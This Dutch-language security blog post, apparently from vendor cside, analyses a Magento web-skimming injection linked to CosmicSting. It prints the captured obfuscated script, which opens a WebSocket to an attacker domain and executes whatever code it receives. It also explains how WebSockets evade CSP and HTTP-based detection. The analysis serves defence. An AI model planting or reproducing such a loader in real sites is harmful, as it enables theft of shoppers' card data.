Bij cside monitoren we actief client-side supply chain-aanvallen, met een focus op de zich ontwikkelende tactieken, technieken en procedures (TTPs) van dreigingsactoren.
Een van de meest voorkomende aanvallen die we de afgelopen maanden hebben waargenomen, is het targeten van eCommerce-websites gebouwd op het Magento-framework.
We volgen in het bijzonder de Cosmic Sting-aanval (CVE-2024-34102) op de voet, waarover breed is gerapporteerd, onder meer door Sansec (https://sansec.io/research/cosmicsting).
Recentelijk waargenomen TTP Traditioneel bestonden deze aanvallen uit het injecteren van JavaScript (JS) van derden om een overlay te creëren die creditcardgegevens (CC) steelt en gevoelige data exfiltreert.
Gisteren echter (zondag 13 oktober) observeerden we een nieuwe en opvallende TTP waarbij de aanvaller een andere aanpak koos.
In plaats van rechtstreeks kwaadaardige JavaScript in de Magento-site te laden, werd er een WebSocket-verbinding opgezet om te communiceren met een externe server. Deze aanval richtte zich op de website sosessentials.co.uk, die draait op Magento 2.4 (Community).
Tijdens ons onderzoek vonden we het volgende geïnjecteerde script op de gecompromitteerde site:
<script>
const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23];
const zep = 42;
window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.href));
window.sss.addEventListener('message', event => {new Function(event.data)()});
</script>Na het decoderen van dit geobfusceerde script ontdekten we dat het een WebSocket-verbinding opzet naar de volgende URL: wss://gstatlc[.]org/jivo?source=.
Op het moment van analyse konden we geen reactie van de externe server ophalen, maar op basis van de aanvalspatronen die we hebben waargenomen, geloven we dat deze verbinding waarschijnlijk bedoeld was voor web skimming, dat wil zeggen het stelen van klantgegevens zoals creditcardinformatie. Details van het domein De externe website, gstatlc.org, was slechts drie dagen eerder aangemaakt, wat een duidelijk alarmsignaal is dat dit domein waarschijnlijk deel uitmaakt van de infrastructuur van de aanvaller.
Hier zijn de relevante domeingegevens:
- Aangemaakt op: 2024-10-11
- Verloopt op: 2025-10-11
- Bijgewerkt op: 2024-10-11
De nieuwe trend: WebSockets voor skimming Deze aanval laat een interessante evolutie in TTPs zien, zeker nu steeds meer beveiligingsleveranciers gewone JavaScript-injectieaanvallen beginnen te detecteren.
In plaats van simpelweg kwaadaardige JavaScript via HTTP te laden, zette de aanvaller een WebSocket-verbinding op (WSS-protocol) om scripts en mogelijk andere data op afstand te laden. Dit maakt de aanval complexer, omdat WebSockets realtime, bidirectionele communicatie bieden die moeilijker te detecteren en te inspecteren is dan gewone HTTP-verzoeken.
Waarom WebSockets?
Enkele opvallende aspecten van het gebruik van WebSockets (WSS) voor aanvallen zijn:
Realtime communicatie: WebSockets maken continue, bidirectionele communicatie mogelijk tussen de client en de externe server, waardoor het eenvoudiger wordt om data te exfiltreren of scripts on the fly aan te passen. Traditionele verdedigingen omzeilen: Veel webbeveiliging en content security policies (CSPs) zijn gericht op het blokkeren van op HTTP gebaseerde resource-loads.
WebSockets, via het WSS-protocol, kunnen detectie ontwijken als ze niet goed worden gemonitord. Minder afhankelijkheid van het herladen van pagina's: In tegenstelling tot traditionele methoden waarbij aanvallers vertrouwen op het injecteren van scripts om data te stelen tijdens het laden van pagina's of gebruikersinteracties, maken WebSockets continue monitoring en exfiltratie van gevoelige data mogelijk zonder dat de gebruiker de pagina hoeft te herladen of weg te navigeren.
De cside-aanpak voor client-side bescherming
Bij cside spelen we een actieve rol in het beschermen van onze gebruikers tegen evoluerende client-side dreigingen zoals hierboven beschreven. Een van de belangrijkste strategieën die we toepassen, is het proxyen van JavaScript-bestanden voor analyse. Hierdoor kunnen we JavaScript-bestanden onderscheppen en inspecteren die websites proberen te laden van externe servers, zodat we zeker weten dat ze veilig zijn en vrij van kwaadaardige inhoud.
Deze aanpak heeft geleid tot een verbetering van 30% in het detecteren en onderscheppen van externe JavaScript-bestanden voordat ze worden uitgevoerd in de browsers van gebruikers. Belangrijk is dat ons systeem ervoor zorgt dat er geen kwaadaardige JS wordt geladen, waardoor aanvallen zoals creditcard skimming en data-exfiltratie effectief worden voorkomen.
Onze focus op het monitoren van client-side activiteit zorgt ervoor dat cside-gebruikers beschermd zijn tegen dit soort geavanceerde aanvallen. We monitoren, analyseren en blokkeren continu schadelijke scripts voordat ze schade kunnen aanrichten, wat een extra beveiligingslaag biedt aan onze gebruikers en ervoor zorgt dat hun gevoelige informatie veilig blijft.
Door voorop te blijven lopen en ons aan te passen aan nieuwe TTPs, zorgen we ervoor dat onze gebruikers altijd een stap voor zijn op aanvallers en hun online omgevingen beschermd zijn tegen dreigingen zoals deze op WebSockets gebaseerde skimming-aanval.
